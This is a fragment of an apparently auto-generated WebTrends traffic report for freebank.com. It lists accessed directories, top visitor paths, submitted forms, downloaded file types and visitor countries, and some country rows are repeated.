<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><A href="http://www.freebank.com/_fpclass">http://www.freebank.com/_fpclass</A></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8365</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">13.27%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">94.3%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">56,959K</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3635</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><A href="http://www.freebank.com/stats">http://www.freebank.com/stats</A></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">698</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.1%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">96.41%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">19,554K</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">159</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><A href="http://www.freebank.com/_private">http://www.freebank.com/_private</A></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">80</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.12%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">98.75%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7,131K</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">75</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><A href="http://www.freebank.com/_vti_bin">http://www.freebank.com/_vti_bin</A></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">44</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.06%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">100%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">52K</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">33</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><A href="http://www.freebank.com/admin">http://www.freebank.com/admin</A></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">33</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.05%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">96.96%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">311K</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">19</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><A href="http://www.freebank.com/cos">http://www.freebank.com/cos</A></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">30</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.04%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">96.66%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">15K</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">17</TD></TR>
</TABLE></CENTER>
<!-- WT_CRLF -->
<!-- WT_PAGEBREAK -->
><HR><P>
</BODY>
<BODY BGCOLOR="#FFFFFF" BACKGROUND="">
<a name="TopPaths"><!--Resources Accessed::Top Paths Through Site--></A>
<!-- WT_H1>Top Paths Through Site</WT_H1 -->
<!-- Start Strip -->
<CENTER><TABLE BORDER=0 WIDTH=100%><TR>
<TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Top Paths Through Site</B></FONT></TD>
<TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD>
</TR></TABLE></CENTER>
<!-- End Strip -->
<P>
<!-- WT_CRLF -->
<FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section identifies the paths people most often follow when visiting the site. The path begins at the page of entry and shows the next six consecutive pages viewed.<!-- /WT_DESCRIPTION --></FONT>
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%>
<TR BGCOLOR="#74C6F6">
<TD COLSPAN=4 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000">
<!-- WT_TABLE_STATS>4, .3, 4.1, .8
, .8
</WT_TABLE_STATS -->
<CENTER><B>Top Paths Through Site</B></CENTER></TD></TR>
<!-- WT_EXCEL_SHEET_NAME>Top Paths Through Site</WT_EXCEL_SHEET_NAME -->
<TR BGCOLOR="#D0D0D0">
<TD WIDTH=5%><B> </B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Pages</CENTER></B></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>% of Total</B></CENTER></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>User Sessions</B></CENTER></TD>
</TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><B>1. http://www.freebank.com/index.htm</B><BR></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">37.48%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2937</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><B>1. http://www.freebank.com/nbf_bye.htm</B><BR></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4.6%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">361</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><B>1. http://www.freebank.com/forrest.asp</B><BR></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4.21%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">330</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><B>1. http://www.freebank.com/nbf_1875-07.htm</B><BR></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3.45%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">271</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><B>1. http://www.freebank.com/nbf_pics.htm</B><BR></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.09%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">164</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><B>1. http://www.freebank.com/nbf_essay_gl_01.htm</B><BR></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.44%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">113</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><B>1. http://www.freebank.com/index.htm</B><BR><I>2. http://www.freebank.com/nbf_pics.htm</I><BR></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.39%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">109</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><B>1. http://www.freebank.com/nbf_books.htm</B><BR></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.37%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">108</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><B>1. http://www.freebank.com/nbfgad.htm</B><BR></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.21%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">95</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><B>1. http://www.freebank.com/nbf_controversies.htm</B><BR></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.19%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">94</TD></TR>
<TR BGCOLOR="#D0D0D0">
<TD> </TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total For the Paths Above</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>58.47%</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>4582</B></TD>
</TR>
</TABLE></CENTER>
<!-- WT_CRLF -->
<!-- WT_PAGEBREAK -->
><HR><P>
</BODY>
<BODY BGCOLOR="#FFFFFF" BACKGROUND="">
<a name="TopForms"><!--Resources Accessed::Most Submitted Forms--></A>
<!-- WT_H1>Most Submitted Forms and Scripts</WT_H1 -->
<!-- Start Strip -->
<CENTER><TABLE BORDER=0 WIDTH=100%><TR>
<TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Most Submitted Forms and Scripts</B></FONT></TD>
<TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD>
</TR></TABLE></CENTER>
<!-- End Strip -->
<P>
<!-- WT_CRLF -->
<FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section identifies the most popular forms or scripts executed by the server. WebTrends counts any line with a Post command or a Get command with a "?" as a form or script, and shows only successful hits.<!-- /WT_DESCRIPTION --></FONT>
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR>
<TD><IMG SRC="index05.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%>
<TR BGCOLOR="#74C6F6">
<TD COLSPAN=5 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000">
<!-- WT_TABLE_STATS>5, .3, 2.7, 1
, 1
, 1
</WT_TABLE_STATS -->
<CENTER><B>Most Submitted Forms & Scripts</B></CENTER></TD></TR>
<!-- WT_EXCEL_SHEET_NAME>Most Submitted Forms</WT_EXCEL_SHEET_NAME -->
<TR BGCOLOR="#D0D0D0">
<TD WIDTH=5%><B> </B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Forms and/or Scripts</CENTER></B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>No. of Forms</CENTER></B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>% of Total</CENTER></B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>User Sessions</CENTER></B></TD>
</TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><I><A href="http://www.freebank.com/banklogin.asp">http://www.freebank.com/banklogin.asp</A></I></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">16</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">100%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11</TD></TR>
</TABLE></CENTER>
<!-- WT_CRLF -->
<!-- WT_PAGEBREAK -->
><HR><P>
</BODY>
<BODY BGCOLOR="#FFFFFF" BACKGROUND="">
<a name="TopExtensions"><!--Resources Accessed::Most Downloaded File Types--></A>
<!-- WT_H1>Most Downloaded File Types and Sizes</WT_H1 -->
<!-- Start Strip -->
<CENTER><TABLE BORDER=0 WIDTH=100%><TR>
<TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Most Downloaded File Types and Sizes</B></FONT></TD>
<TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD>
</TR></TABLE></CENTER>
<!-- End Strip -->
<P>
<!-- WT_CRLF -->
<FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section identifies the accessed file types and the total kilobytes downloaded for each file type. Cached requests and erred hits are excluded from the totals.<!-- /WT_DESCRIPTION --></FONT>
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR>
<TD><IMG SRC="index06.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%>
<TR BGCOLOR="#74C6F6">
<TD COLSPAN=4 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000">
<!-- WT_TABLE_STATS>4, .3, 3.7, 1, 1</WT_TABLE_STATS -->
<CENTER><B>Most downloaded File Types</B></CENTER></TD></TR>
<!-- WT_EXCEL_SHEET_NAME>Most Downloaded File Types</WT_EXCEL_SHEET_NAME -->
<TR BGCOLOR="#D0D0D0">
<TD WIDTH=5%><B> </B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>File type</CENTER></B></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>Files</B></CENTER></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>K Bytes Transferred</B></CENTER></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>gif</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">20479</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">139,325K</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>htm</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">14721</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">226,990K</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>jpg</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">12128</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">388,415K</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>class</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7879</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">56,956K</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>asp</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1033</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">65K</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>*.</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">102</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">29K</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>txt</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">78</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7,182K</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>html</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">75</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">61K</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>dll</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">44</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">52K</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>ida</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">33</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6K</TD></TR>
<TR BGCOLOR="#D0D0D0">
<TD> </TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total Files & K Bytes Transferred</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>56572</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>819,077K</B></TD></TR>
</TABLE></CENTER>
<!-- WT_CRLF -->
<!-- WT_PAGEBREAK -->
><HR><P>
</BODY>
<BODY BGCOLOR="#FFFFFF" BACKGROUND="">
<a name="TopCountries"><!--Visitors & Demographics::Most Active Countries--></A>
<!-- WT_H1>Most Active Countries</WT_H1 -->
<!-- Start Strip -->
<CENTER><TABLE BORDER=0 WIDTH=100%><TR>
<TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Most Active Countries</B></FONT></TD>
<TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD>
</TR></TABLE></CENTER>
<!-- End Strip -->
<P>
<!-- WT_CRLF -->
<FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section identifies the top locations of the visitors to the site by country. The country of the user is determined by the suffix of their domain name. Use this information carefully because this information is based on where the domain name of the visitor is registered, and may not always be an accurate identifier of the actual geographic location of this visitor (for example, while a vast majority of .com domain
names are from the United States, there is a small minority of domain
names that exist outside of the United States.)<!-- /WT_DESCRIPTION --></FONT>
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR>
<TD><IMG SRC="index07.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%>
<TR BGCOLOR="#74C6F6">
<TD COLSPAN=3 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000">
<!-- WT_TABLE_STATS>3, .3, 4.7, 1</WT_TABLE_STATS -->
<CENTER><B>Most Active Countries</B></CENTER></TD></TR>
<!-- WT_EXCEL_SHEET_NAME>Most Active Countries</WT_EXCEL_SHEET_NAME -->
<TR BGCOLOR="#D0D0D0">
<TD WIDTH=5%><B> </B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Countries</CENTER></B></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>User Sessions</B></CENTER></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>United States </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>7453</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>United States </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>7453</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>United States </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>7453</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>United States </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>7453</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>United States </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>7453</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Canada </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>108</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Canada </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>108</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Canada </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>108</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Canada </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>108</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Canada </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>108</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Australia </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>62</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Australia </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>62</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
